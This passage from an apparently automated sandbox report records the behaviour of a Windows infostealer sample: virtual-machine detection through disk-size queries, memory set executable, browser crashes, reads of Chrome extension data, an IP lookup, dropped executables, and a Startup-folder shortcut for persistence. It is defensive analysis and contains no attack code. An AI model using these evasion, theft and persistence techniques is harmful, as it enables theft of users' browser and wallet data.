NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c03000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x757c9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75522000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 19, 2024, 7:50 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2988 crashed
__exception__ Feb. 19, 2024, 7:51 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 100659276 registers.edi: 84748556 registers.eax: 100659276 registers.ebp: 100659356 registers.edx: 36 registers.ebx: 100659640 registers.esi: 2147746133 registers.ecx: 84731464	1	0	0
__exception__ Feb. 19, 2024, 7:51 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x716d540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716d52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x717b0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 65591480 registers.edi: 1953561104 registers.eax: 65591480 registers.ebp: 65591560 registers.edx: 1 registers.ebx: 5665396 registers.esi: 2147746133 registers.ecx: 3769344914	1	0	0

Application Crash

Process iexplore.exe with pid 2988 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Feb. 19, 2024, 7:51 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 100659276
registers.edi: 84748556
registers.eax: 100659276
registers.ebp: 100659356
registers.edx: 36
registers.ebx: 100659640
registers.esi: 2147746133
registers.ecx: 84731464

__exception__

Feb. 19, 2024, 7:51 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x716d540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716d52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x717b0ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 65591480
registers.edi: 1953561104
registers.eax: 65591480
registers.ebp: 65591560
registers.edx: 1
registers.ebx: 5665396
registers.esi: 2147746133
registers.ecx: 3769344914

Steals private information from local Internet browsers (50 out of 2354 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\a77VWg3R2bV_Qy103LSX.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\PDbNNj6OmrILaV3JtHH1.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\y3p6n3ne22r3BFOUsYqb.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\cHXwqlMWUMGBBwN9hxfj.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\jlzfI3MOMBv1vbp25nBj.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

Creates a suspicious process (4 events)

